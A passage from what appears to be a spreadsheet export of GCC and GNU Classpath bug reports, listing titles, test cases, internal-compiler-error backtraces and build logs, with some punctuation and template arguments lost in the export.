All seems fine except that libgnarl-6.dll libgnarl.dll.a libgnat-6.dll and libgnat.dll.a are nowhere to be found either in my build tree or in my staged installation tree.  A colleague building natively on MS-Windows (a process which takes approximately six times longer that my cross-hosted build) with the same configuration (except for the necessary build/host/target differences) confirms that these shared libraries and import libraries are created by his build.
What might I be missing to get these components delivered by the crossed-native build?  I've observed the same omission from previous GCC-4.9.3 and GCC-5.3.0 crossed-native builds and I like to see a resolution before I progress to any attempt to build GCC-7.x</t>
  </si>
  <si>
    <t>keith.marshall</t>
  </si>
  <si>
    <t>GCC-33495</t>
  </si>
  <si>
    <t>[4.1 regression] Broken diagnostic: Trouble pretty-printing statement expressions</t>
  </si>
  <si>
    <t>The C++ frontend generates a broken diagnostic for the following code
snippet since GCC 4.0.0:
==============================================
void foo()
{
  if (({while(true)}))
}
==============================================
bug.cc: In function 'void foo()':
bug.cc:3: error: could not convert '#'while_stmt' not supported by dump_expr#' to 'bool'
This is completely broken since we try to print a *_stmt via dump_expr.
There are lots of other testcases with other statements like if for
break etc.</t>
  </si>
  <si>
    <t>GCC-58618</t>
  </si>
  <si>
    <t>Wrong code with character substring and ASSOCIATE</t>
  </si>
  <si>
    <t>character(1) :: s(1)
    associate (x=&gt;s(1)(1:1))
    end associate
  end
gfortran ice11.f90 
f951: internal compiler error: NeoprÃ¡vnÄ›nÃ½ pÅ™Ã­stup do pamÄ›ti (SIGSEGV)
0x8ba79f crash_signal
        ../../gcc-4.8-20130509/gcc/toplev.c:332
0x5b16ca resolve_fl_variable
        ../../gcc-4.8-20130509/gcc/fortran/resolve.c:11256
0x5b16ca resolve_symbol
        ../../gcc-4.8-20130509/gcc/fortran/resolve.c:13714
0x5d0053 do_traverse_symtree
        ../../gcc-4.8-20130509/gcc/fortran/symbol.c:3575
0x5af144 resolve_types
        ../../gcc-4.8-20130509/gcc/fortran/resolve.c:14901
0x5afb10 gfc_resolve
        ../../gcc-4.8-20130509/gcc/fortran/resolve.c:15001
0x5bcb50 gfc_resolve
        ../../gcc-4.8-20130509/gcc/fortran/resolve.c:14994
0x5bcb50 resolve_block_construct
        ../../gcc-4.8-20130509/gcc/fortran/resolve.c:9367
0x5bcb50 resolve_code
        ../../gcc-4.8-20130509/gcc/fortran/resolve.c:10311
0x5bec4e resolve_codes
        ../../gcc-4.8-20130509/gcc/fortran/resolve.c:14975
0x5afb22 gfc_resolve
        ../../gcc-4.8-20130509/gcc/fortran/resolve.c:15003
0x5a4662 resolve_all_program_units
        ../../gcc-4.8-20130509/gcc/fortran/parse.c:4406
0x5a4662 gfc_parse_file()
        ../../gcc-4.8-20130509/gcc/fortran/parse.c:4673
0x5dfd15 gfc_be_parse_file
        ../../gcc-4.8-20130509/gcc/fortran/f95-lang.c:189
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>vladimir.fuka</t>
  </si>
  <si>
    <t>GCC-58599</t>
  </si>
  <si>
    <t>[c++11] Trouble with non-static data member initializers in templates</t>
  </si>
  <si>
    <t>The following code snippets (compiled with -std=c++11) trigger ICEs various places since GCC 4.7.0 (when non-static data member initializers were introduced):
=============================================
template struct A
template struct A
{
  template struct B
  {
    template int foo() {}
    int i = foo()
  }
}
=============================================
bug.cc: In substitution of 'template template int A::B  &gt;::foo() [with  =   = int  = ]':
bug.cc:9:22:   required from here
bug.cc:7:28: internal compiler error: tree check: accessed elt 2 of tree_vec with 1 elts in tsubst_pack_expansion at cp/pt.c:9535
     template int foo() {}
                            ^
0xce33c5 tree_vec_elt_check_failed(int int char const* int char const*)
        ../../gcc/gcc/tree.c:9361
0x5aa862 tree_vec_elt_check
        ../../gcc/gcc/tree.h:2799
0x5aa862 tsubst_pack_expansion
        ../../gcc/gcc/cp/pt.c:9535
0x5b89a2 tsubst_template_args
        ../../gcc/gcc/cp/pt.c:9738
0x5b87dc tsubst_template_args
        ../../gcc/gcc/cp/pt.c:9756
0x5b910e tsubst_aggr_type
        ../../gcc/gcc/cp/pt.c:9971
0x5acb1d tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11364
0x5ac217 tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11354
0x5b6fa6 tsubst_arg_types
        ../../gcc/gcc/cp/pt.c:11012
0x5b73ce tsubst_function_type
        ../../gcc/gcc/cp/pt.c:11111
0x5aca1c tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11822
0x5d21d5 fn_type_unification(tree_node* tree_node* tree_node* tree_node* const* unsigned int tree_node* unification_kind_t int bool bool)
        ../../gcc/gcc/cp/pt.c:15361
0x53f0fc add_template_candidate_real
        ../../gcc/gcc/cp/call.c:2923
0x53ae69 add_template_candidate
        ../../gcc/gcc/cp/call.c:3020
0x53ae69 add_candidates
        ../../gcc/gcc/cp/call.c:5075
0x542536 build_new_method_call_1
        ../../gcc/gcc/cp/call.c:7697
0x542536 build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
        ../../gcc/gcc/cp/call.c:7883
0x6427ad cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5980
0x64483d cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7009
0x64540f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7701
Please submit a full bug report [etc.]
=============================================
template struct A
template struct A
{
  template struct B
  {
    template int foo() {}
    int i = foo()
  }
}
=============================================
bug.cc: In substitution of 'template template int A::B  &gt;::foo() [with  =   = int  = ]':
bug.cc:9:22:   required from here
bug.cc:7:28: internal compiler error: tree check: accessed elt 2 of tree_vec with 1 elts in tsubst at cp/pt.c:11429
     template int foo() {}
                            ^
0xce33c5 tree_vec_elt_check_failed(int int char const* int char const*)
        ../../gcc/gcc/tree.c:9361
0x5aea72 tree_vec_elt_check
        ../../gcc/gcc/tree.h:2799
0x5aea72 tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11429
0x5b86fa tsubst_template_args
        ../../gcc/gcc/cp/pt.c:9774
0x5b910e tsubst_aggr_type
        ../../gcc/gcc/cp/pt.c:9971
0x5acb1d tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11364
0x5ac217 tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11354
0x5b6fa6 tsubst_arg_types
        ../../gcc/gcc/cp/pt.c:11012
0x5b73ce tsubst_function_type
        ../../gcc/gcc/cp/pt.c:11111
0x5aca1c tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11822
0x5d21d5 fn_type_unification(tree_node* tree_node* tree_node* tree_node* const* unsigned int tree_node* unification_kind_t int bool bool)
        ../../gcc/gcc/cp/pt.c:15361
0x53f0fc add_template_candidate_real
        ../../gcc/gcc/cp/call.c:2923
0x53ae69 add_template_candidate
        ../../gcc/gcc/cp/call.c:3020
0x53ae69 add_candidates
        ../../gcc/gcc/cp/call.c:5075
0x542536 build_new_method_call_1
        ../../gcc/gcc/cp/call.c:7697
0x542536 build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
        ../../gcc/gcc/cp/call.c:7883
0x6427ad cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5980
0x64483d cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7009
0x64540f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7701
0x6458cf cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:7937
Please submit a full bug report [etc.]
=============================================
template struct A
template struct A
{
  template struct B
  {
    template int foo() {}
    int i = foo()
  }
}
=============================================
bug.cc: In substitution of 'template template int A::B &gt;::foo() [with  =   = int]':
bug.cc:9:22:   required from here
bug.cc:9:22: internal compiler error: in retrieve_specialization at cp/pt.c:1030
     int i = foo()
                      ^
0x593b50 retrieve_specialization
        ../../gcc/gcc/cp/pt.c:1027
0x5d0ba0 instantiate_template_1
        ../../gcc/gcc/cp/pt.c:15023
0x5d0ba0 instantiate_template(tree_node* tree_node* int)
        ../../gcc/gcc/cp/pt.c:15117
0x5d264a fn_type_unification(tree_node* tree_node* tree_node* tree_node* const* unsigned int tree_node* unification_kind_t int bool bool)
        ../../gcc/gcc/cp/pt.c:15466
0x53f0fc add_template_candidate_real
        ../../gcc/gcc/cp/call.c:2923
0x53ae69 add_template_candidate
        ../../gcc/gcc/cp/call.c:3020
0x53ae69 add_candidates
        ../../gcc/gcc/cp/call.c:5075
0x542536 build_new_method_call_1
        ../../gcc/gcc/cp/call.c:7697
0x542536 build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
        ../../gcc/gcc/cp/call.c:7883
0x6427ad cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5980
0x64483d cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7009
0x64540f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7701
0x6458cf cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:7937
0x645d26 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:7987
0x645d26 cp_parser_constant_expression
        ../../gcc/gcc/cp/parser.c:8197
0x6472f6 cp_parser_late_parse_one_default_arg
        ../../gcc/gcc/cp/parser.c:23056
0x6364f5 cp_parser_late_parsing_nsdmi
        ../../gcc/gcc/cp/parser.c:23110
0x6364f5 cp_parser_class_specifier_1
        ../../gcc/gcc/cp/parser.c:19068
0x638930 cp_parser_class_specifier
        ../../gcc/gcc/cp/parser.c:19101
0x638930 cp_parser_type_specifier
        ../../gcc/gcc/cp/parser.c:14080
Please submit a full bug report [etc.]
A last variant is wrongly rejected:
=============================================
template struct A
template struct A
{
  template struct B
  {
    template int foo() {}
    int i = foo()
  }
}
=============================================
bug.cc:9:22: error: no matching function for call to 'A::B &gt;::foo()'
     int i = foo()
                      ^
bug.cc:9:22: note: candidate is:
bug.cc:7:28: note: template &gt; template int A::B &gt;::foo()
     template int foo() {}
                            ^
bug.cc:7:28: note:   template argument deduction/substitution failed:
bug.cc: In substitution of 'template &gt; template int A::B &gt;::foo() [with  =  int  = int]':
bug.cc:9:22:   required from here
bug.cc:7:28: error: type/value mismatch at argument 1 in template parameter list for 'template &gt; struct A::B'
bug.cc:7:28: error:   expected a constant of type 'int' got 'int'</t>
  </si>
  <si>
    <t>GCC-6992</t>
  </si>
  <si>
    <t>[3.4 regression] GCC-3.1.x - attribute 'section' broken for constructors</t>
  </si>
  <si>
    <t>class a {
  public:
    __attribute__((section(whatever))) a()
    __attribute__((section(whatever))) void b(void)
}
this is how it used to work until gcc-3.0.4 or so...
after upgrading to gcc-3.1 (debian package) the
code chunk mentioned before fails to compile with this complaint (only for the class constructor):
warning: 'section' attribute ignored
declaration does not declare anything
parse error before ')' token
however this works:
class a {
  public:
    a() __attribute__((section(whatever)))
    __attribute__((section(whatever))) void b(void)
}
shouldn't be theese two constructor declarations equivalent?
a() __attribute__((section(whatever)))
__attribute__((section(whatever))) a()
Release:
gcc-3.1.x
Environment:
debian linux x86
How-To-Repeat:
try to compile this:
class a {
  public:
    __attribute__((section(whatever))) a()
}</t>
  </si>
  <si>
    <t>petr</t>
  </si>
  <si>
    <t>GCC-70520</t>
  </si>
  <si>
    <t>Incorrect child stack alignment in c-c++-common/asan/clone-test-1.c</t>
  </si>
  <si>
    <t>c-c++-common/asan/clone-test-1.c has
int main(int argc char **argv) {
  int i
  const int kStackSize = 1 &lt;&lt; 20
  char child_stack[kStackSize + 1]
  char *sp = child_stack + kStackSize  /* Stack grows down. */
  printf(Parent: %p\n sp)
  pid_t clone_pid = clone(Child sp CLONE_FILES | CLONE_VM NULL 0 0 0)
There is no guarantee that sp will be aligned at 16 bytes which
is required by x86 psABIs.</t>
  </si>
  <si>
    <t>GCC-14906</t>
  </si>
  <si>
    <t>Run-time error on empty format</t>
  </si>
  <si>
    <t>$ cat b.f
! from NIST test FM406.FOR
         CHARACTER*10 A10VK
         A10VK = 'XXXXXXXXXX'
         WRITE(A10VK39110)
39110    FORMAT()
         PRINT*A10VK
         END
$ gfortran b.f
$ ./a.out
At line 4 of file b.f
Fortran runtime error: Unexpected element in format
()
 ^
$ g77 b.f
$ ./a.out
$ gfortran --version
GNU Fortran 95 (GCC 3.5-tree-ssa 20040410 (merged 20040331))</t>
  </si>
  <si>
    <t>bdavis9659</t>
  </si>
  <si>
    <t>GCC-16120</t>
  </si>
  <si>
    <t>[4.0 Regression] bootstrap failure on arm-linux</t>
  </si>
  <si>
    <t>HEAD 20040620 configured for arm-linux
although 
./xgcc -B./ -B/usr/lib/gcc-snapshot/arm-linux-gnu/bin/ -isystem
/usr/lib/gcc-snapshot/arm-linux-gnu/include -isystem
/usr/lib/gcc-snapshot/arm-linux-gnu/sys-include
-L/build/buildd/gcc-snapshot-20040620/build/gcc/../ld -O2 -DIN_GCC    -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition
 -isystem ./include  -I. -I. -I../../src/gcc -I../../src/gcc/.
-I../../src/gcc/../include -I../../src/gcc/../libcpp/include
-I../../src/gcc/../libbanshee/libcompat -I../../src/gcc/../libbanshee
-I../../src/gcc/../libbanshee/points-to   -g0 -finhibit-size-directive
-fno-inline-functions -fno-exceptions -fno-zero-initialized-in-bss
-fno-unit-at-a-time  \
   -c ../../src/gcc/crtstuff.c -DCRT_BEGIN \
  -o crtbegin.o
./xgcc -B./ -B/usr/lib/gcc-snapshot/arm-linux-gnu/bin/ -isystem
/usr/lib/gcc-snapshot/arm-linux-gnu/include -isystem
/usr/lib/gcc-snapshot/arm-linux-gnu/sys-include
-L/build/buildd/gcc-snapshot-20040620/build/gcc/../ld -O2 -DIN_GCC    -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition
 -isystem ./include  -I. -I. -I../../src/gcc -I../../src/gcc/.
-I../../src/gcc/../include -I../../src/gcc/../libcpp/include
-I../../src/gcc/../libbanshee/libcompat -I../../src/gcc/../libbanshee
-I../../src/gcc/../libbanshee/points-to   -g0 -finhibit-size-directive
-fno-inline-functions -fno-exceptions -fno-zero-initialized-in-bss
-fno-unit-at-a-time  -fPIC \
   -c ../../src/gcc/crtstuff.c -DCRT_BEGIN -DCRTSTUFFS_O \
  -o crtbeginS.o
../../src/gcc/crtstuff.c: In function `__do_global_dtors_aux':
../../src/gcc/crtstuff.c:288: error: insn outside basic block
(insn 82 2 83 (set (reg:SI 10 sl)
        (unspec:SI [
                (const:SI (minus:SI (const (symbol_ref:SI
(_GLOBAL_OFFSET_TABLE_)))
                        (const:SI (plus:SI (label_ref:SI 0)
                                (const_int 8 [0x8])))))
            ] 3)) -1 (nil)
    (nil))
../../src/gcc/crtstuff.c:288: internal compiler error: in rtl_verify_flow_info
at cfgrtl.c:2230
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [crtbeginS.o] Error 1
make[4]: Leaving directory `/build/buildd/gcc-snapshot-20040620/build/gcc'
make[3]: *** [stage1_build] Error 2
make[3]: Leaving directory `/build/buildd/gcc-snapshot-20040620/build/gcc'
make[2]: *** [bootstrap-lean] Error 2
20040520 this failed at the same place the bootstraps between these two dates
got until errors building the runtime libraries the last sucessful bootstrap
was 20040404.
all build logs at http://buildd.debian.org/build.php?arch=arm&amp;pkg=gcc-snapshot</t>
  </si>
  <si>
    <t>GCC-2086</t>
  </si>
  <si>
    <t>bootstrap error libstdc++-v3/src/local.cc:  op -</t>
  </si>
  <si>
    <t>Compiling here on a UnixWare 7.1.1 box that's an
i586-sco-sysv5uw7.1.1 using gnu-make and SCO's cc
not that it matters if I use gcc becuase this is a
stage two or later error when it's using xgcc.
I throw in binutils but I don't use glibc for lack
of a good reason.
Here's the error that I see:
----------------------------------------------------------
../../../../gcc/libstdc++-v3/src/locale.cc: In function `static unsigned int
   std::locale::_S_normalize_category(unsigned int)':
../../../../gcc/libstdc++-v3/src/locale.cc:480: warning: `int __ret' might be
   used uninitialized in this function
UX:as: WARNING: /var/tmp/cce3odFb.s:2940:section already defined: .text._ZNSt6locale21_S_normalize_categoryEj
UX:as: ERROR: /var/tmp/cce3odFb.s:3025:defined relocatable values from the same section required op -
gmake[4]: *** [locale.lo] Error 1
gmake[4]: Leaving directory `/home/matthew/Uber/CVS/objdir/i586-sco-sysv5uw7.1.1/libstdc++-v3/src'
gmake[3]: *** [all-recursive] Error 1
gmake[3]: Leaving directory `/home/matthew/Uber/CVS/objdir/i586-sco-sysv5uw7.1.1/libstdc++-v3'
gmake[2]: *** [all-recursive-am] Error 2
gmake[2]: Leaving directory `/home/matthew/Uber/CVS/objdir/i586-sco-sysv5uw7.1.1/libstdc++-v3'
gmake[1]: *** [all-target-libstdc++-v3] Error 2
gmake[1]: Leaving directory `/home/matthew/Uber/CVS/objdir'
gmake: *** [bootstrap] Error 2
------------------------------------------------------------------
This did not occur in 2.95.2.1 but it's been happening
in 2.97 CVS and 3.1 CVS.
I'm not sure what other information would be helpful but
thanks for whatever you can do on this.
Release:
CVS gcc 3.1 - checked out 2/24 1300 PST.
Environment:
Here's the environment variables:
LD_LIBRARY_PATH=/usr/lib:/lib:/usr/local/lib:/usr/ccs/lib:/usr/local/BerkeleyDB/lib
LIBPATH=/usr/lib:/lib:/usr/local/lib:/usr/ccs/lib:/usr/local/BerkeleyDB/lib
PATH=/sbin:/usr/sbin:/etc:/usr/bin:/usr/local/bin:/usr/ccs/bin:/usr/local/kde/bin:/usr/X/bin
I used SCO's cc
gmake 3.79.1
binutils 2.10.1
m4-1.4p
autoconf 2.13
automake 1.4c
I checkedout the latest CVS and built this in a seperate
objdir.
I used the following to configure:
------------------------------------------------------
CC=cc ../gcc/configure --enable-shared --enable-threads --disable-nls --enable-languages=c++ --x-includes=/usr/X/include --x-libraries=/usr/X/lib --with-as=/usr/bin/as --with-gnu-ld --with-ld=/usr/local/bin/ld &gt; con.log 2&gt;&amp;1
-------------------------------------------------------------------
Then I used gmake bootstrap &gt; make.log 2&gt;&amp;1
How-To-Repeat:
It happends every time that I compile with that 
configure statement or if I get rid of the
--disable-nls which I didn't know if it had anything
to do with locales.</t>
  </si>
  <si>
    <t>mschalit</t>
  </si>
  <si>
    <t>GCC-45895</t>
  </si>
  <si>
    <t>-Wunused-but-set-variable complains for almost all Objective-C objects</t>
  </si>
  <si>
    <t>It seems that -Wunused-but-set-variable complains any time an Objective-C object variable is set and only used to invoke methods.  This is incorrect when a variable is used to invoke a method it is used. :-)
(hence compiling any Objective-C with -Wall generates lots of wrong warnings).
Here is a testcase --
#include 
#include 
int main (void)
{
  id o = nil
  [o hash]
  return 0
}
Here are what happens when you compile:
[nicola@lampone ~]$ gcc -Wall bug.m -lobjc -c
bug.m: In function â€˜mainâ€™:
bug.m:6:6: warning: variable â€˜oâ€™ set but not used [-Wunused-but-set-variable]
[nicola@lampone ~]$ 
The warning is obviously incorrect because 'o' *is* used.  This is on a i686-pc-linux-gnu.
Thanks</t>
  </si>
  <si>
    <t>GCC-44480</t>
  </si>
  <si>
    <t>[C++0x] Linear performance of begin() in unordered associative containers</t>
  </si>
  <si>
    <t>The current implementation of begin() for unordered associative containers is linear (a search for the first non-empty bucket is executed each time begin() is called) yet the C++0x drafts specifiy that this should be constant (23.3.1 table 93). Boost.Unordered for instance caches the first non-empty bucket on insertion/deletion to meet the O(1) begin() requirement.</t>
  </si>
  <si>
    <t>joaquin</t>
  </si>
  <si>
    <t>GCC-47540</t>
  </si>
  <si>
    <t>ARM THUMB crash with complex numbers</t>
  </si>
  <si>
    <t>When I compile this C code with -O2 -mthumb on a current mainline compiler configured for arm-rtems4.11 it crashes.
extern double f1 (_Complex double)
extern _Complex double f2 (_Complex double)
_Complex double f (_Complex double x) { return f1 (x) == 0 ? 0 : f2 (x) }
&gt; gcc/xgcc -Bgcc/ -c -O2 -mthumb foo.c
foo.c: In function 'f':
foo.c:3:1: internal compiler error: in find_valid_class at reload.c:710
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The error is the gcc_assert at the end of find_valid_class.
This code compiles OK on x86 and on ARM when not using -mthumb.</t>
  </si>
  <si>
    <t>GCC-21966</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in verify_ssa building 64-bit zlib on IRIX 6</t>
  </si>
  <si>
    <t xml:space="preserve">
Bootstrapping current mainline on IRIX 6.5 with --enable-libgcj fails building the 64-bit zlib:
/.vol/gcc/obj/gcc-4.1.0-20050607/6.5-gcc-java/./gcc/xgcc -B/.vol/gcc/obj/gcc-4.1.0-20050607/6.5-gcc-java/./gcc/ -B/.vol/gcc/share/mips-sgi-irix6.5/bin/ -B/.vol/gcc/share/mips-sgi-irix6.5/lib/ -isystem /.vol/gcc/share/mips-sgi-irix6.5/include -isystem /.vol/gcc/share/mips-sgi-irix6.5/sys-include -DPACKAGE_NAME=\\ -DPACKAGE_TARNAME=\\ -DPACKAGE_VERSION=\\ -DPACKAGE_STRING=\\ -DPACKAGE_BUGREPORT=\\ -DPACKAGE=\zlib\ -DVERSION=\1.1.4\ -DSTDC_HEADERS=1 -DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1 -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1 -DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1 -DHAVE_INTTYPES_H=1 -DHAVE_UNISTD_H=1 -DHAVE_STDLIB_H=1 -DHAVE_UNISTD_H=1 -DHAVE_GETPAGESIZE=1 -DHAVE_MMAP=1 -DHAVE_MEMCPY=1 -DHAVE_STRERROR=1 -DHAVE_UNISTD_H=1 -I. -I/.vol/gcc/src/gcc-dist/zlib -O2 -g -O2 -mabi=64 -c /.vol/gcc/src/gcc-dist/zlib/inffast.c   -DPIC -o .libs/inffast.o
/.vol/gcc/src/gcc-dist/zlib/inffast.c: In function 'inflate_fast':
/.vol/gcc/src/gcc-dist/zlib/inffast.c:70: error: Definition in block 49 does not dominate use in block 47
for SSA_NAME: D.2252_580 in statement:
D.2256_585 = D.2252_580 /[fl] 3
/.vol/gcc/src/gcc-dist/zlib/inffast.c:70: internal compiler error: verify_ssa failed.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [inffast.lo] Error 1
Environment:
System: IRIX64 columba 6.5 10120104 IP27
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: /.vol/gcc/src/gcc-dist/configure --prefix=/.vol/gcc --with-local-prefix=/.vol/gcc --disable-nls --with-gnu-as --with-as=/homes/ro/bin/gas-2.15 --enable-libgcj --with-gmp-dir=/.vol/gcc/obj/gmp-4.1.3 --with-mpfr-dir=/.vol/gcc/obj/gmp-4.1.3/mpfr --disable-libmudflap
How-To-Repeat:
Bootstrap mainline as described above.</t>
  </si>
  <si>
    <t>GCC-3733</t>
  </si>
  <si>
    <t>[FreeBSD] using .data instead of .bss</t>
  </si>
  <si>
    <t>Following simple code
char a[1000][1000]
Compiles to
.globl a
        .data
        .align 32
        .type   a@object
        .size   a1000000
a:
        .zero   1000000
For some reason room for 'a' is allocated in .data instead
of .bss.
C (not C++) compiler is free of this problem.
Release:
3.0
Environment:
FreeBSD 4.3</t>
  </si>
  <si>
    <t>ank</t>
  </si>
  <si>
    <t>GCC-64652</t>
  </si>
  <si>
    <t>[SH] ICE when using -mdiv=call-fp</t>
  </si>
  <si>
    <t>Compiling the following example:
int test (int a int b int c int d)
{
  return (a / b) + c + d
}
with -O2 -m4 -ml -mdiv=call-fp
results in:
sh_tmp.cpp: In function 'test':
sh_tmp.cpp:672:1: error: unrecognizable insn:
 }
 ^
(insn 50 30 12 (set (reg:SI 146 pr)
        (unspec:SI [
                (reg:SI 154 fpscr0)
            ] UNSPEC_SFUNC)) sh_tmp.cpp:671 -1
     (nil))
sh_tmp.cpp:672:1: internal compiler error: in num_delay_slots at config/sh/sh.md:537
It looks like the SH mach pass expects the first use to be the GP reg that holds the sfunc address.  Changing the order of the uses seems to fix the problem:
Index: gcc/config/sh/sh.md
===================================================================
--- gcc/config/sh/sh.md	(revision 219623)
+++ gcc/config/sh/sh.md	(working copy)
@@ -24028 +24028 @@
    (clobber (reg:SI R4_REG))
    (clobber (reg:SI R5_REG))
    (clobber (reg:SI FPSCR_STAT_REG))
-   (use (reg:SI FPSCR_MODES_REG))
-   (use (match_operand:SI 1 arith_reg_operand r))]
+   (use (match_operand:SI 1 arith_reg_operand r))
+   (use (reg:SI FPSCR_MODES_REG))]
   TARGET_FPU_DOUBLE &amp;&amp; ! TARGET_FPU_SINGLE
   jsr	@%1%#
   [(set_attr type sfunc)
@@ -26748 +26748 @@
    (clobber (reg:DF DR0_REG))
    (clobber (reg:DF DR2_REG))
    (clobber (reg:SI FPSCR_STAT_REG))
-   (use (reg:SI FPSCR_MODES_REG))
-   (use (match_operand:SI 1 arith_reg_operand r))]
+   (use (match_operand:SI 1 arith_reg_operand r))
+   (use (reg:SI FPSCR_MODES_REG))]
   TARGET_FPU_DOUBLE &amp;&amp; ! TARGET_FPU_SINGLE
   jsr	@%1%#
   [(set_attr type sfunc)</t>
  </si>
  <si>
    <t>GCC-3170</t>
  </si>
  <si>
    <t>bogus suggest parentheses warning</t>
  </si>
  <si>
    <t>The suggest parentheses around &amp;&amp; within || warning is
given for innocent code. This is more a small annoyance
than a serious bug
Release:
gcc version 3.0 20010611 (prerelease) host/target: x86
Environment:
x86 linux 2.2.14
How-To-Repeat:
Compile the following with -Wall:
int bar(int x int y int z)
{
        if((x &amp;&amp; y &amp;&amp; 1) || z) {
		return 1
        }
	return 0
}</t>
  </si>
  <si>
    <t>mattiase</t>
  </si>
  <si>
    <t>GCC-42060</t>
  </si>
  <si>
    <t>[4.4 Regression] [c++0x] ICE throwing array with initializer list</t>
  </si>
  <si>
    <t>The following invalid testcase triggers an ICE since GCC 4.4.1:
==================
void foo()
{
  int a[1]
  throw a = {}
}
==================
bug.cc: In function 'void foo()':
bug.cc:4:14: error: invalid use of non-lvalue array
bug.cc:4:15: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in useless_type_conversion_p at tree-ssa.c:1221
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>paolo</t>
  </si>
  <si>
    <t>GCC-7746</t>
  </si>
  <si>
    <t>static members of template classes not allways constructed</t>
  </si>
  <si>
    <t>Program uses static members in template classes whose initialisation produces a side effect.
The compiled program does not show that side effect. 
The static member isn't initialized which I understand as a bug in the generation of the different template instanciations
Release:
gcc3 (GCC) 3.1 (Red Hat Linux 7.3 3.1-1)
Environment:
Red Hat Linux 7.3 on a PIV 2GHz
How-To-Repeat:
compile the attachement using 
g++3 simplest.cxx -o simplest &amp;&amp; ./simplest
result: 0 is printed whereas 3 is expected
partial workaround:
compile
g++3 -DMIPSPRO simplest.cxx -o simplest &amp;&amp; ./simplest
result printed: 2 whereas 3 is expected</t>
  </si>
  <si>
    <t>david.margery</t>
  </si>
  <si>
    <t>GCC-4739</t>
  </si>
  <si>
    <t>gcc version 2.95.3 20010315 (SuSE) produces internal error</t>
  </si>
  <si>
    <t>&gt; g++ mpi.cpp
mpi.cpp: In method `void pq::insert(nodes)':
mpi.cpp:64: Internal compiler error in `find_function_data' at function.c:543
Release:
gcc version 2.95.3 20010315 (SuSE)
Environment:
SuSE 7.2 Intel Celeron 400MHz 128MB RAM</t>
  </si>
  <si>
    <t>hinkelma</t>
  </si>
  <si>
    <t>CLASSPATH-26736</t>
  </si>
  <si>
    <t>integrate system clipboard with swing text selection mechanism</t>
  </si>
  <si>
    <t>Selecting some text in a Swing textcomponent should put that text into the system selection. When someone clicks with the middle mouse button into another component (not neccessarily a Java app) this text will be pasted.
If the target component is a Swing component too it should pase the text and place the cursor behind that text.</t>
  </si>
  <si>
    <t>thebohemian</t>
  </si>
  <si>
    <t>GCC-9731</t>
  </si>
  <si>
    <t>[ABI] 64bit: err in alignment of classes in dump file</t>
  </si>
  <si>
    <t>In 32bit the alignment for class B is 8 but 4 with 64bit.
a.cpp 
----------------------------------------------------------------------------
struct A {}
struct B {
        static A b_static_a
        long double b_ld 
} 
A B::b_static_a 
B b
----------------------------------------------------------------------------
Actual class hierarchy file (a.cpp.class):
------------------------------------------------
Class A
   size=1 align=1
A (0x40066100) 0 empty
Class B
   size=8 align=4
B (0x40066440) 0
------------------------------------------------
Expected class hierarchy fie:
---------------------------------------------------
Class A
   size=1 align=1
A (0x00000000) 0 empty
Class B
   size=8 align=8
B (0x00000000) 0
---------------------------------------------------
Release:
GCC Version: 3.2.0
Environment:
System Type:
Linux Version 2.4.19 SuSE SLES 8 (ppc) - Kernel 2.4.19-ul1-ppc64-SMP (36).
GNU assembler version 2.12.90.0.15 (powerpc-suse-linux) using BFD version 2.12.9
0.0.15 20020717 (SuSE)
Options given when GCC was configured/built:
Configured with: /usr/src/packages/BUILD/cross-ppc64-gcc-3.2/gcc-3.2/configure -
-enable-languages=cc++f77 --prefix=/opt/cross --host=powerpc-suse-linux --targ
et=powerpc64-linux --enable-threads=posix --disable-nls --enable-shared --with-h
eaders=/usr/src/packages/BUILD/cross-ppc64-gcc-3.2/include-ppc64-glibc-2.2.5
Thread model: posix
gcc version 3.2
How-To-Repeat:
// g++ must be the 64bit compiler 
g++ -fdump-class-hierarchy -c a.cpp</t>
  </si>
  <si>
    <t>lei</t>
  </si>
  <si>
    <t>GCC-44118</t>
  </si>
  <si>
    <t>ICE: in instantiate_decl at cp/pt.c:16657</t>
  </si>
  <si>
    <t>Tested revisions:
r159305 - crash (after pr34491 fix)
4.5 r158978 - crash
4.4 r158133 - crash
Compiler output:
$ /mnt/svn/gcc-trunk/binary-159305-lto-fortran/bin/g++ testcase.C
